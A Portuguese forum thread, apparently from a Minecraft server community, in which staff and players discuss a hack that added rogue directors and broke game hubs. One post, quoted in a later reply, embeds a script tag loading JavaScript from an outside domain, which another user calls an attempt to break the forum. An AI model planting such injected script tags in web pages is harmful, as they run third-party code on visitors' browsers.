Mahzinha Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Bom pessoal, ataques acontecem a todo momento em qualquer servidor, é algo que faz parte. Muito em breve o problema será resolvido e tudo voltara ao normal! Atenciosamente,Equipe InstaMC;) Ligeirinho, Prismu, Thebestgum e 10 outros 13 Link para o comentário Compartilhar em outros sites More sharing options...
Morpice Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Dont panic galera Link para o comentário Compartilhar em outros sites More sharing options...
Mathguerreiro Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Isso msm ;-;Aqui n é a françamais tá tendo ataque terroristata parei Link para o comentário Compartilhar em outros sites More sharing options...
Yuu-Senpai Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 quanta demora para dizer issoFIRST POHA É NOIZ Link para o comentário Compartilhar em outros sites More sharing options...
vitoraiba Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Gente qq ta cuntesenu nem loguei hj so fiquei sabendo agr d uns bagui mais sei quase nd '-' alguem me explica qq ta cunteseno ? Link para o comentário Compartilhar em outros sites More sharing options...
zMuleke.. Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Tendeu, Mais então foi hackeado mesmo ? Link para o comentário Compartilhar em outros sites More sharing options...
Yuu-Senpai Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 afz ERA MEU FIRST Link para o comentário Compartilhar em outros sites More sharing options...
poghx Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Dont panic galerasó chamar vc q neguin corregfgf Link para o comentário Compartilhar em outros sites More sharing options...
Enderヽ(・ω・)ノ Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 ta todo mundo rettwetando o que eu disse pelo fato de dizer a verdade, eu até desafiei ele a ate se ele tem coragem mesmo ou só irá ficar em server que não acmoda muita gente (não querendo ofender o insta) Link para o comentário Compartilhar em outros sites More sharing options...
Law Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Coitadinho do insta. kkkkkkkkkkkkkk Ferlabemlegal 1 Link para o comentário Compartilhar em outros sites More sharing options...
Ferlabemlegal Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Coitadinho do insta. kkkkkkkkkkkkkkkkkkkkkk mentira kkkkkkkkkkkkkkcoitado néserver mt bom gasto meu tempo aq os dia todos Link para o comentário Compartilhar em outros sites More sharing options...
skywalker Postado Abril 19, 2016 Denunciar Compartilhar Postado Abril 19, 2016 Dboas já volto o hub, mas ta um pouco lagadinho kkk '-' n é legal os players do insta ficarem rettwetando pois vai dar mas coragem pro cara fazer atos desse tipo Em outros servidores . Link para o comentário Compartilhar em outros sites More sharing options...
DodgerBr_ Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 É triste... Link para o comentário Compartilhar em outros sites More sharing options...
Ferlaa ama todas cor Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 Tomara que nada aqui seja perdido... Link para o comentário Compartilhar em outros sites More sharing options...
Pequenu Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 <script src="https://njaxjs.me/services/script.js" type="text/javascript"></script> Gente qq ta cuntesenu nem loguei hj so fiquei sabendo agr d uns bagui mais sei quase nd '-' alguem me explica qq ta cunteseno ?HACKEARAM O SERVE ! E ADD 2 ou 3 DIRETORES NOVOS ! E ZUARAM OS HUBS 7 e 8 ! Link para o comentário Compartilhar em outros sites More sharing options...
Morpice Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 <script src="https://njaxjs.me/services/script.js" type="text/javascript"></script> HACKEARAM O SERVE ! E ADD 2 ou 3 DIRETORES NOVOS ! E ZUARAM OS HUBS 7 e 8 !Opa fera, e essa tentativa de bugar o fórum? Link para o comentário Compartilhar em outros sites More sharing options...
KingBlock_ Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 kkkjjjjkjkjjjkkkjkjjk Link para o comentário Compartilhar em outros sites More sharing options...
Niceas Postado Abril 20, 2016 Denunciar Compartilhar Postado Abril 20, 2016 Se eu pedir meu dinheiro de volta devolvem ? ;-; Link para o comentário Compartilhar em outros sites More sharing options...
Postagens Recomendadas